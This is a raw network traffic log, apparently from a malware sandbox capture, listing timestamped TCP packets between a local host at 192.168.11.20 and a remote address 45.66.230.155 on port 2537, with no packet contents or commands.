Jun 1, 2023 22:36:41.377109051 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377140999 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377186060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377190113 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377252102 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377279997 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377300024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377347946 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377377987 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377407074 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377451897 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377469063 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377475977 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377492905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377510071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377538919 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377556086 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377573967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377574921 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377574921 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377609015 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377645016 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377665997 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377674103 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377675056 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377703905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377727985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377763987 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377787113 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377790928 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377809048 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377830029 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377840042 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377850056 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377870083 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377888918 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377890110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377911091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377931118 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377949953 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377969980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377990007 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.377990007 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.377990007 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378022909 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378046036 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378079891 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378103971 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378107071 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378107071 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378123999 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378154039 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378174067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378204107 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378210068 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378235102 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378252983 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378263950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378288984 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378323078 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378323078 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378329992 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378362894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378385067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378407001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378418922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378429890 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378432035 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378457069 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378469944 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378482103 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378493071 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378494978 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378515959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378529072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378540993 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378552914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378572941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378575087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378592968 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378612041 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378640890 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378659010 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378673077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378674030 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378689051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378700972 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378712893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378725052 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378737926 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378748894 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378753901 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378771067 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378783941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378796101 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378814936 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378828049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378837109 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378842115 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378860950 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378880978 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378885031 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378901958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378916979 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378928900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378943920 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378956079 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378968000 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378979921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.378983021 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.378997087 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379015923 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379028082 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379040003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379051924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379071951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379087925 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379106998 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379120111 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379128933 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379128933 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379144907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379163980 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379175901 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379185915 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379220009 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379234076 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379245996 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379265070 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379277945 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379290104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379301071 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379323959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379336119 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379348040 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379360914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379369020 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379369020 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379369020 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379390001 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379403114 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379427910 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379442930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379455090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379475117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379482985 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379491091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379512072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379529953 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379529953 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379532099 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379554033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379570961 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379585981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379599094 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379610062 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379622936 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379635096 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379647970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379673958 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379673958 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379723072 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379723072 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.379865885 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.379888058 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380024910 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380059958 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380078077 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380094051 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380110025 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380122900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380136013 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380156994 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380170107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380183935 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380198002 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380215883 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380228043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380239964 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380263090 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380275011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380283117 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380283117 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380291939 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380322933 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380343914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380363941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380377054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380388975 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380399942 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380412102 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380424023 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380435944 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380454063 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380454063 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380454063 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380454063 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380626917 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380673885 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.380974054 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.380995989 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381057024 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381109953 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381122112 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381134033 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381149054 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.381156921 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381170988 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381182909 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381217003 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381227970 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.381334066 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.381517887 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.433573961 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.543365955 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.543551922 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.561425924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561472893 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561486959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561605930 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561619043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561640978 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561654091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561666965 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561678886 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561698914 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561711073 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561721087 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.561727047 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561745882 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.561903954 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.561903954 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.562546968 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562653065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562720060 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562782049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562834024 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.562839031 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562854052 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562875986 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562889099 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562901020 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562912941 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.562925100 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563026905 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563026905 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563208103 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563214064 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563266993 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563337088 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563410997 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563419104 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563441038 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563461065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563491106 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563510895 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563528061 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563530922 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563576937 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563585043 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563636065 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.563662052 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.563734055 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.564138889 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564269066 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564325094 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564337969 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.564342976 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564363956 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564388990 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564407110 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564445019 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.564456940 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564481974 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564493895 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.564500093 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564517021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.564543009 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.564634085 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.564992905 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565114021 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565165997 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565233946 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565254927 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.565294981 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565334082 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565357924 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565371990 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.565377951 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565396070 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565416098 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565432072 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.565454960 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.565502882 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.565588951 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566015959 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566133022 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566181898 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566195011 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566206932 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566219091 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566236973 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566375971 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566375971 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566433907 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566476107 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566576004 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566589117 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566617012 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566667080 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566688061 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566735029 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566766977 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566790104 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566802979 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.566807985 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566828966 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566849947 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.566884995 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567001104 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567001104 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567411900 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567461967 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567522049 CEST	2537	49850	45.66.230.155	192.168.11.20
Jun 1, 2023 22:36:41.567595959 CEST	49850	2537	192.168.11.20	45.66.230.155
Jun 1, 2023 22:36:41.567651033 CEST	2537	49850	45.66.230.155	192.168.11.20
